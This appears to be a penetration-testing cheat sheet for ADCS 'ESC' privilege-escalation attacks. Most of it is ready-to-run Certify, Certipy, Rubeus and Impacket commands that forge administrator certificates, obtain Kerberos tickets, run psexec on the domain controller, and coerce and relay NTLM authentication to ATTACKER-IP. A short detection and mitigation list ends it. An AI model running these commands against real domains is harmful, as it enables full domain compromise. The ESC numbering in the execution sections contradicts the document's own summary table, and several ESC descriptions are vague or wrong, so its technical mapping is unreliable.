Internal Pentest

adcs_vulnerabilities

Technique

Active Directory Certificate Services (ADCS) is Microsoft’s Public Key Infrastructure (PKI) implementation that provides certificate-based functionalities to users and machines within a domain. However, misconfigurations in ADCS can lead to various privilege escalation vulnerabilities collectively known as ESC (Escalation via Certificates) vulnerabilities.

These vulnerabilities, when exploited, can allow attackers to:

  • Obtain certificates for any user/computer in the domain
  • Impersonate other users, including domain administrators
  • Authenticate to services using certificate-based authentication
  • Escalate privileges within the domain

Prerequisites

Access Level: Varies by vulnerability (some require domain user, others just network access)

System State: Active Directory Certificate Services deployed in the domain

Tools: Certify, Certipy, Rubeus, PKINITtools, ADCS-Attack, Impacket

Enumeration

Discovering ADCS Infrastructure

Windows (Local):

# Using Certify
Certify.exe cas
 
# Using PowerShell
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties *
Get-ADObject -LDAPFilter "(objectCategory=pKICertificateTemplate)" -Properties *

Linux (Remote):

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout
 
# Using ldapsearch
ldapsearch -H ldap://dc.domain.local -D "user@domain.local" -w Password123 -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" "(objectClass=pKIEnrollmentService)"
 
# Using netexec
nxc ldap dc.domain.local -u user -p Password123 -M adcs

Identifying Vulnerable Templates

Windows (Local):

# Using Certify
Certify.exe find /vulnerable
 
# Checking specific ESC vulnerabilities
Certify.exe find /vulnerable /exploit

Linux (Remote):

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -vulnerable
 
# Full ADCS enumeration
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout -debug

Checking Certificate Authority Access Rights

Windows (Local):

# Using Certify
Certify.exe find /ca
 
# Check ACLs on CA objects
Get-ADObject -Identity "CN=CA-NAME,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Properties nTSecurityDescriptor | Select-Object -ExpandProperty nTSecurityDescriptor

Linux (Remote):

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -ca
ESC NumberVulnerability DescriptionKey RequirementsPrimary Tool(s)
ESC1User impersonation via enrollee-supplied SAN- Client Authentication EKU - Enrollee Supplies Subject enabled - Low-privilege Enroll rights - No manager approvalcertipy req
ESC2User impersonation via “Any Purpose” EKU- Any Purpose EKU (or no EKU) - Enrollee Supplies Subject enabled - Low-privilege Enroll rights - No manager approvalcertipy req (two-stage)
ESC3User impersonation via Enrollment Agent EKU- Certificate Request Agent EKU - Enrollee Supplies Subject enabled - Low-privilege Enroll rights - No manager approvalcertipy req -on-behalf-of
ESC4Template modification via weak ACLs- WriteOwner, WriteDacl, WriteProperty, or GenericAll on template object for a low-privilege usercertipy template
ESC5PKI object modification via weak container ACLs- Dangerous permissions on PKI containers in AD (e.g., CN=Public Key Services)ADSI Edit, PowerShell AD module
ESC6CA-level SAN abuse- EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled on CA - Any template with Client Auth EKU and low-privilege Enroll rightscertipy req
ESC7CA takeover via weak CA permissions- ManageCA or ManageCertificates permissions on CA object for a low-privilege usercertipy ca
ESC8NTLM relay to web enrollment- Web Enrollment (/certsrv) enabled - NTLM authentication accepted - No EPA or HTTPS enforcementntlmrelayx.py, certipy relay

Execution

ESC1: User impersonation via enrollee-supplied SAN

Vulnerability: Certificate templates with dangerous settings like:

  • Client Authentication EKU enabled
  • ENROLLEE_SUPPLIES_SUBJECT flag set
  • No manager approval required
  • Domain Users have enrollment rights

NOTE

Prerequisites: Domain user account with enrollment rights to the vulnerable template.

Exploitation:

Windows:

# Using Certify
Certify.exe find /vulnerable
 
# Request certificate using vulnerable template
Certify.exe request /ca:CA-NAME /template:VulnTemplate /altname:administrator
 
# Convert certificate to PFX format (may happen automatically with Certify)
# If you have a certificate file:
CertUtil -exportPFX -p "Password123" CertificateFile.cer OutputFile.pfx
 
# Using the certificate with Rubeus
Rubeus.exe asktgt /user:administrator /certificate:OutputFile.pfx /password:Password123 /ptt

Linux:

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10
 
# Request certificate using vulnerable template
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'VulnTemplate' -dc-ip 10.10.10.10
 
# Convert certificate to pfx (if needed)
certipy cert -pfx user.pfx -password 'Password123' -username 'administrator' -domain 'domain.local'
 
# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
 
# Alternative: Using gettgtpkinit from PKINITtools
gettgtpkinit -cert-pfx administrator.pfx -pfx-pass Password123 domain.local/administrator administrator.ccache
 
# Use the TGT
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@dc.domain.local -k -no-pass

ESC2: Misconfigured Certificate Template Access Control

Vulnerability: Certificate templates with over-permissive ACLs allowing users to modify settings

NOTE

Prerequisites: Domain user account with write permissions on certificate templates.

Caution: Modifying template settings is a visible change that could be detected and may disrupt legitimate certificate issuance. Consider restoring original settings after exploitation.

Exploitation:

Windows (Local):

# Using Certify to find templates with weak ACLs
Certify.exe find /vulnerable
 
# Manual modification using PowerShell
# This is complex and requires deep AD schema knowledge
# Example of enabling ENROLLEE_SUPPLIES_SUBJECT flag:
$template = Get-ADObject -Identity "CN=TargetTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Properties *
$newValue = $template.'msPKI-Certificate-Name-Flag' -bor 1
Set-ADObject -Identity $template.DistinguishedName -Replace @{'msPKI-Certificate-Name-Flag'=$newValue}
 
# Use the modified template as in ESC1
Certify.exe request /ca:CA-NAME /template:TargetTemplate /altname:administrator

Linux (Remote):

# Enumerate ACLs on certificate templates
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout -vulnerable
 
# If you have write access to a template, modify it to be vulnerable
certipy template -u user@domain.local -p Password123 -template 'TargetTemplate' -save-old
 
# Request certificate using the modified template
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'TargetTemplate' -alt 'administrator@domain.local'
 
# After exploitation, restore the original template
certipy template -u user@domain.local -p Password123 -template 'TargetTemplate' -restore

ESC3: Enrollment Agent Templates

Vulnerability: Certificate templates that allow users to enroll on behalf of other users

NOTE

Prerequisites:

  • Access to an Enrollment Agent certificate
  • The CA must have a template with the Certificate Request Agent EKU
  • Permission to enroll in both templates

Exploitation:

Windows (Local):

# Using Certify
# Request enrollment agent certificate
Certify.exe request /ca:CA-NAME /template:EnrollmentAgentTemplate
 
# Request certificate on behalf of another user
# This typically requires Windows Certificate MMC or web enrollment
# More complex to automate in PowerShell

Linux (Remote):

# Request enrollment agent certificate
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'EnrollmentAgentTemplate'
 
# Request certificate on behalf of another user
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'UserTemplate' -on-behalf-of 'administrator@domain.local' -pfx enrollment-agent.pfx

ESC4: Vulnerable Certificate Authority Access Control

Vulnerability: Over-permissive ACLs on the Certificate Authority itself

WARNING

Prerequisites: Domain user with manage CA permissions.

Impact: This exploitation modifies CA settings, which can have significant operational impact on the PKI infrastructure. Changes should be reverted after testing.

Exploitation:

Windows (Local):

# Using Certify to enumerate CA permissions
Certify.exe find /ca
 
# Using certutil to enable a template
certutil -config "CA-NAME\domain-DC-CA" -template +VulnTemplate
 
# After exploitation, disable the template
certutil -config "CA-NAME\domain-DC-CA" -template -VulnTemplate

Linux (Remote):

# Enumerate CA permissions
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -ca
 
# If manage CA permission, enable vulnerable template:
certipy ca -u user@domain.local -p Password123 -ca 'CA-NAME' -enable-template 'VulnTemplate'
 
# After exploitation, disable the template
certipy ca -u user@domain.local -p Password123 -ca 'CA-NAME' -disable-template 'VulnTemplate'

ESC5: Vulnerable Certificate Authority Enrollment Access Control

Vulnerability: Certificate Authority with dangerous enrollment policies

NOTE

Prerequisites: Write permissions on CA enrollment policies.

Caution: Modifying enrollment policies may disrupt legitimate certificate operations.

Exploitation: Similar to ESC4, focuses on enrollment access controls rather than management access controls.

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag Set

Vulnerability: CA configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag allowing subject alternative name manipulation

NOTE

Prerequisites: The CA must have the EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled.

Detection Risk: This attack doesn’t modify settings but can create detectable certificate requests.

Exploitation:

Windows (Local):

# Check if flag is enabled using certutil
certutil -config "CA-NAME\domain-DC-CA" -getreg policy\EditFlags
# Look for EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000) in the flags
 
# Using Certify
Certify.exe request /ca:CA-NAME /template:User /altname:administrator

Linux (Remote):

# Check if flag is enabled
certipy find -u user@domain.local -p Password123 -ca
 
# Request certificate with alternative name
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'User' -san 'administrator@domain.local'

ESC7: Vulnerable Certificate Authority Enrollment Service Access Control

Vulnerability: Misconfigured access controls on the web enrollment service

NOTE

Prerequisites:

  • Web enrollment must be enabled
  • User must have enrollment permissions

Exploitation:

Windows (Local):

# Using Certify to check web enrollment
Certify.exe find
 
# Typically requires manual exploitation via browser
# Navigate to https://ca-server/certsrv/
# Request certificate > advanced certificate request > submit PKCS #10 request

Linux (Remote):

# Enumerate web enrollment permissions
certipy find -u user@domain.local -p Password123 -web-enrollment
 
# If vulnerable, generate certificate request and submit via the enrollment service
# This may require custom scripting to interact with the web enrollment interface

ESC8: NTLM Relay to Active Directory Certificate Services Web Enrollment

Vulnerability: NTLM authentication on the Certificate Enrollment Web Service can be relayed

WARNING

Prerequisites:

  • Web enrollment must use NTLM authentication
  • No EPA (Extended Protection for Authentication)
  • No HTTPS enforced

Impact: Requires triggering NTLM authentication from a privileged account, which may create logs and alerts.

Exploitation:

Windows (Local):

# From Windows, you typically need multiple tools
# 1. Set up Inveigh for NTLM capturing and relaying
Import-Module .\Inveigh.ps1
Inveigh-Relay -ConsoleOutput Y -Target http://adcs.domain.local/certsrv/ -Attack ADCS
 
# 2. Coerce authentication from a target
# Using SpoolSample, PetitPotam, or other authentication coercion technique
.\PetitPotam.exe -d domain.local -u user -p password ATTACKER-IP DC-IP

Linux (Remote):

# Set up relay attack with ntlmrelayx
ntlmrelayx.py -t http://adcs.domain.local/certsrv/ -smb2support --adcs
 
# Coerce authentication from target using Impacket tools
# Using PetitPotam (MS-EFSRPC) coercion
impacket-petitpotam -d domain.local -u user -p password ATTACKER-IP DC-IP
 
# Or using PrinterBug (MS-RPRN) coercion
impacket-printerbug domain.local/user:password@DC-IP ATTACKER-IP

ESC9: No Security Extension

Vulnerability: Templates without security extensions allowing for certificate misuse

NOTE

Prerequisites: Access to templates without proper security extensions.

Exploitation:

Windows (Local):

# Using Certify
Certify.exe find /vulnerable
 
# Request certificate from vulnerable template
Certify.exe request /ca:CA-NAME /template:VulnTemplate
 
# Use for unintended authentication scenarios

Linux (Remote):

# Request certificate without security extensions
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'VulnTemplate'
 
# Use for unintended authentication scenarios

ESC10: Certificate Authority Configuration Disclosure

Vulnerability: Disclosure of CA configuration information to unprivileged users

NOTE

Prerequisites: Network access to the CA.

Impact: Passive information gathering only, no system changes.

Exploitation: Information gathered can be used to identify other vulnerabilities and aid in attacks.

ESC11: Subject Alternative Name Untrusted Values

Vulnerability: Certain certificate fields are not properly validated

NOTE

Prerequisites: Access to templates that don’t properly validate SAN fields.

Detection Risk: Creates certificate requests that may be logged and detected.

Exploitation:

Windows (Local):

# Using Certify
Certify.exe request /ca:CA-NAME /template:User /altname:administrator

Linux (Remote):

# Request certificate with manipulated alternative name values
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'User' -san 'administrator@domain.local'

Detection & Mitigation

Detection

  • Monitor certificate issuance, especially for sensitive principals
  • Look for unusual certificate request patterns
  • Audit certificate template modifications
  • Monitor for the use of certificates for authentication
  • Watch for changes to CA configuration settings
  • Review logs for suspicious certificate enrollments

Mitigation

General Mitigations:

  • Apply the principle of least privilege to CA and template permissions
  • Require manager approval for sensitive certificate templates
  • Implement proper access controls on certificate enrollment
  • Use strong authentication for certificate enrollment
  • Regularly audit certificate templates and CA configurations

ESC1-specific:

  • Remove the ENROLLEE_SUPPLIES_SUBJECT flag from templates
  • Restrict enrollment rights to necessary groups only
  • Disable vulnerable templates

ESC2-specific:

  • Review and restrict ACLs on certificate templates
  • Remove unnecessary write permissions
  • Implement approval requirements for template modifications

ESC3-specific:

  • Restrict enrollment agent templates to necessary users only
  • Require manager approval for certificates issued by enrollment agents
  • Monitor the use of enrollment agent certificates

ESC4/ESC5-specific:

  • Review and restrict ACLs on the CA
  • Monitor for changes to CA configuration
  • Implement approval workflows for CA modifications

ESC6-specific:

  • Disable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA
  • If the flag is required, implement additional validation

ESC7-specific:

  • Restrict access to web enrollment interfaces
  • Implement strong authentication for web enrollment
  • Use certificate enrollment policies

ESC8-specific:

  • Enable Extended Protection for Authentication (EPA)
  • Require HTTPS for certificate enrollment
  • Implement SMB signing and LDAP signing
  • Disable NTLM where possible and use Kerberos

ESC9-specific:

  • Ensure all templates include appropriate security extensions
  • Review certificate usage in the environment
  • Implement certificate issuance policies

ESC10-specific:

  • Restrict access to CA configuration information
  • Implement proper information disclosure controls
  • Use access control to limit who can query CA configurations

ESC11-specific:

  • Validate all certificate fields properly
  • Implement proper input validation for certificate requests
  • Use application policies to restrict certificate usage